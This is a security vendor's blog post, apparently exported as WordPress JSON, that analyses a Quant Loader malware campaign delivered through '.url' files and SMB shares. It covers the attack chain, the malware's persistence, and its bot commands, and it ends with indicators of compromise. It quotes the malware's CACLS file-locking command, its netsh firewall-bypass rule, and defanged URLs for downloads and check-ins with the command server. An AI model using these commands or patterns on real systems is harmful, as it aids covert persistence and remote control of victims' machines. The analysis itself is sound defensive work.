{"id":86049,"date":"2018-03-19T19:49:13","date_gmt":"2018-03-19T14:19:13","guid":{"rendered":"https:\/\/blogs_admin.quickheal.com\/?p=86049"},"modified":"2018-03-20T10:58:20","modified_gmt":"2018-03-20T05:28:20","slug":"depth-analysis-new-emerging-url-malware-campaign-analysis-quick-heal-security-labs","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/depth-analysis-new-emerging-url-malware-campaign-analysis-quick-heal-security-labs\/","title":{"rendered":"An in-depth analysis of a new, emerging “.url” malware campaign – by Quick Heal Security Labs"},"content":{"rendered":"

Last week, we had blogged about the emergence of a new attack vector \u2018.url\u2019<\/a> which is used to spread malware. In this blog post, we will deep-dive into the attack chain of this \u2018.url\u2019 vector and elaborate on the Quant Loader malware which is actively making use of it.<\/p>\n

Let\u2019s take a look at the below attack chain which depicts the execution sequence observed in this attack where a “.url” file is being used to spread malware.<\/p>\n

\"Fig
Fig 1. Attack Chain<\/figcaption><\/figure>\n

Following is the figure of process summary of the attack chain.<\/p>\n

\"Fig
Fig 2. Process Summary<\/figcaption><\/figure>\n

As explained above, generally \u201c.url\u201d contains URL (\u201chttps:\/\/\u201d or \u201chttps:\/\/\u201d), but in this case, we have observed SMB shares being accessed to execute a malicious JavaScript.<\/p>\n

\"Fig
Fig 3. .URL File accessing SMB share<\/figcaption><\/figure>\n

The above file is related to CVE-2016-3353<\/a> where an Internet Explorer mishandles \u2018.url\u2019 files from the Internet zone and allows remote attackers to bypass intended access restrictions via a crafted file.<\/p>\n

These SMB shares are publicly accessible and can be accessed without authentication. Fig 3 and 4 show public SMB share location \u201cbuyviagraoverthecounterusabb[.]net\/documents\/\u201d where the malicious JavaScript files are stored. The malicious SMB share location IP address is \u201c91.102.153.90\u201d.<\/p>\n

\"Fig
Fig 4. Communication captures while SMB shares access<\/figcaption><\/figure>\n
\"Fig
Fig 5. JavaScript Files stored publicly<\/figcaption><\/figure>\n

The following figure shows a malicious JavaScript being delivered to the victim via SMB protocol.<\/p>\n

\"Fig
Fig 6. SMB request<\/figcaption><\/figure>\n

Upon opening the malicious JavaScript, it\u2019s opening by \u2018wscript.exe\u2019 application.<\/p>\n

\"Fig
Fig 7. User Prompt<\/figcaption><\/figure>\n

The second stage malware is downloaded by a malicious JavaScript once the victim clicks on \u2018Open\u2019, as shown in Fig 5. This malicious JavaScript is highly obfuscated and is only used as a first stage downloader.<\/p>\n

\"Fig
Fig 8. Malicious JavaScript downloader<\/figcaption><\/figure>\n

The second stage malware is downloaded in \u2018%TEMP%\u2019 location by JavaScript and spawned through \u2018cmd.exe\u2019. This is a heavily obfuscated executable which gets directly executed in the memory. This malware appears to be a variant of \u2018Quant Loader<\/strong>\u2019 and can be used to download other malware. At the time of analysis by Quick Heal Security Labs, we did not observe malware downloaded by Quant Loader. Let\u2019s take a look at the working of the Quant Loader malware.<\/p>\n

The Quant Loader malware checks for all of the keyboard locale of the system through \u201cKeyboard Layout\\Preload\u201d. It exits if the locale is any amongst the Russian, Ukraine, and Kazakhstan.<\/p>\n

\"Fig
Fig 9. Check for the locale of the system<\/figcaption><\/figure>\n

Quant Loader makes use of the following registry key to identify the 32\/64 bit configuration of the victim\u2019s system. It then uses the same information as part of CNC request while communicating with the CnC server.<\/p>\n

HKLM\\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion\u00a0 ProgramFilesDir (x86)<\/em><\/p>\n

It also checks for the presence of following registry entries.<\/p>\n

\"Fig
Fig 10. Check presence of different security products<\/figcaption><\/figure>\n

It drops a self-copy by the name \u2018dwm.exe\u2019 in \u2018<Appdata ShellFolder>\\<8DigitNumeric>\u2019 folder and sets the same for auto execution through \u201cRun\u201d entry in registry. This is done to achieve persistence in the system.<\/p>\n

\"Fig
Fig 11. Self-copy of the malware file<\/figcaption><\/figure>\n

This 8 Digit Number is used as a Bot ID (BotId) while communicating with the CNC Server. It generates the BotId through the following steps:<\/p>\n

    \n
  1. Read \u2018HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\u2019<\/li>\n
  2. Extracts only digits from the value of Machine ID in occurring sequence<\/li>\n
  3. Omit first 5 numbers and considers 8 digits from 5 onwards<\/li>\n<\/ol>\n
    \"Fig
    Fig 12. Use of MachineGuid as BotId<\/figcaption><\/figure>\n

    It then changes the user access permission of 8 digit folder and \u2018dwm.exe\u2019 file to read mode for the logged-in user. This restricts the user to delete or modify the folder and \u2018dwm.exe\u2019. This is achieved by making use of a genuine CACLS windows file through the following command.<\/p>\n

    cmd \/c echo Y|CACLS “c:\\users\\<username>\\appdata\\roaming\\48378942\\dwm.exe” \/P “<username>:R”<\/em><\/strong><\/p>\n

    \u00a0<\/strong>The Quant Loader then adds the below rule in the Firewall with the name “Quant” which allows the malware to communicate on the Internet bypassing Firewall rules.<\/p>\n

    netsh advfirewall firewall add rule name=”Quant” program=”c:\\users\\<username>\\appdata\\roaming\\48378942\\dwm.exe” dir=Out action=allow<\/em><\/strong><\/p>\n

    It also tries to connect to the CNC domain \u2018wassronledorhad[.]in\u2019 and download other malicious files.<\/p>\n

    The CNC was not responding when the analysis was carried out. However, the static analysis gives some insights into the probable CNC communication and other functionalities of Quant Loader.<\/p>\n

    The below files would have been downloaded if the CNC server was alive.<\/p>\n

    hxxp:\/\/wassronledorhad.in\/q2\/lib\/zs.dll.c
    \n<\/em>hxxp:\/\/wassronledorhad.in\/q2\/lib\/bs.dll.c
    \n<\/em>hxxp:\/\/wassronledorhad.in\/q2\/lib\/sql.dll.c<\/em><\/p>\n

    These files are stored in %APPDATA%\\z folder as zs.dll, bs.dll and sqlite3.dll respectively.<\/p>\n

    \"Fig
    Fig 13. Download file names<\/figcaption><\/figure>\n

    It checks the filesize of \u2018zs.dll\u2019 and \u2018sqlite3.dll\u2019 for less than 0x20000. It then executes the \u201cMain\u201d function from zs.dll.<\/p>\n

    \"Fig
    Fig 14. Load and execute the downloaded DLL<\/figcaption><\/figure>\n

    Quant Loader tried to send the following requests to the CNC Server.<\/p>\n

    hxxp:\/\/wassronledorhad[.]in\/q2\/index.php?id=48378942&c=2&mk=75490e&il=H&vr=1.73&bt=32<\/em><\/strong><\/p>\n

    Wherein the id = BotId, c = request counter, bt = 32\/64 bit system<\/p>\n

    It waits for the command from the CNC server which has the following structure:<\/p>\n

    [BotId][Command][Data]<\/em><\/p>\n

    The command can be any of the following – \u201cpwd\u201d, \u201cexe\u201d, \u201cdoc\u201d, \u201cdll\u201d.<\/p>\n

    \"Fig
    Fig 15. List of bot commands<\/figcaption><\/figure>\n

    The \u201cpwd\u201d command was also found to be executing the zs.dll with the \u201cMain\u201d function.<\/p>\n

    For the rest of the commands, the malware creates a file with a name as windows timestamp in \u2018temp\u2019 folder.<\/p>\n

    \"Fig
    Fig 16. Use of system time to make file name<\/figcaption><\/figure>\n

    If the command is \u201cexe\u201d then it executes the file with ShellExecute API.<\/p>\n

    \"Fig
    Fig 17. Call to ShellExecute to execute downloaded exe file<\/figcaption><\/figure>\n

    If the command is \u201cdoc\u201d then it executes the file with WinExec API.<\/p>\n

    \"Fig
    Fig 18. Call to WinExec to execute downloaded doc file<\/figcaption><\/figure>\n

    If the command is \u201cdll\u201d then it makes use of \u201cLoadLibrary\u201d and \u201cGetProcaddress\u201d to execute the desired function from dll as seen in fig 13 given earlier.<\/p>\n

    Thus, depending on the commands, the bot may download other malicious files and execute them.<\/p>\n

    The \u2018.Url\u2019 attack vector is currently being used by Quant Loader. We may see a rise in the use of this novice attack vector (.url) by other malware families in the coming days.<\/p>\n

    Indicators of compromise:<\/strong><\/p>\n

    50C359167CC74A962CACAFF2A795B23C
    \n4394536E9A53B94A2634C68043E76EF8
    \nbuyviagraoverthecounterusabb[.]net\/documents\/B200795218387[.]js
    \n91.102.153.90<\/p>\n

    Subject Matter Experts<\/strong><\/p>\n

      \n
    • Pradeep Kulkarni, Amar Patil, Aniruddha Dolas | Quick Heal Security Labs<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"

      Last week, we had blogged about the emergence of a new attack vector \u2018.url\u2019 which is used to spread malware. In this blog post, we will deep-dive into the attack chain of this \u2018.url\u2019 vector and elaborate on the Quant Loader malware which is actively making use of it. Let\u2019s take a look at the […]<\/p>\n","protected":false},"author":31,"featured_media":86070,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,24,303,5],"tags":[78,1327,247,49,25,1588,1328,1587],"class_list":["post-86049","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-email","category-malware","category-phishing","category-security","tag-botnet","tag-cve","tag-javascript","tag-malware","tag-phishing","tag-smb","tag-spam-campaign","tag-url"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/86049"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/31"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=86049"}],"version-history":[{"count":2,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/86049\/revisions"}],"predecessor-version":[{"id":86071,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/86049\/revisions\/86071"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/86070"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=86049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=86049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=86049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}